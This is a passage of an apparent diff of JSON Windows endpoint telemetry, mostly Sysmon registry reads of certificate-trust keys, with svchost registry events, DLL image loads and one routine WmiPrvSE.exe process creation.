"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - 
"registry_value": "Software Publishing", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": 
"CTLs", - "timestamp": 131883573483230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wmiutils.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wmiutils.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": 
"Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573483390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - 
"registry_value": "HKCR", - "timestamp": 131883573488550000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573488550000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573488550000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573488550000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573488550000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "command_line": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding", - "event_type": "process", - "logon_id": 997, - "parent_process_name": "svchost.exe", - "parent_process_path": "C:\\Windows\\System32\\svchost.exe", - "pid": 4036, - "ppid": 780, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "subtype": "create", - "timestamp": 131883573488670000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}", - "unique_ppid": "{42FC7E13-B293-5C05-0000-0010FAC80000}", - "user": "NT AUTHORITY\\LOCAL SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "LOCAL 
SERVICE" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573488700016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573488700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573488700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573488700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - 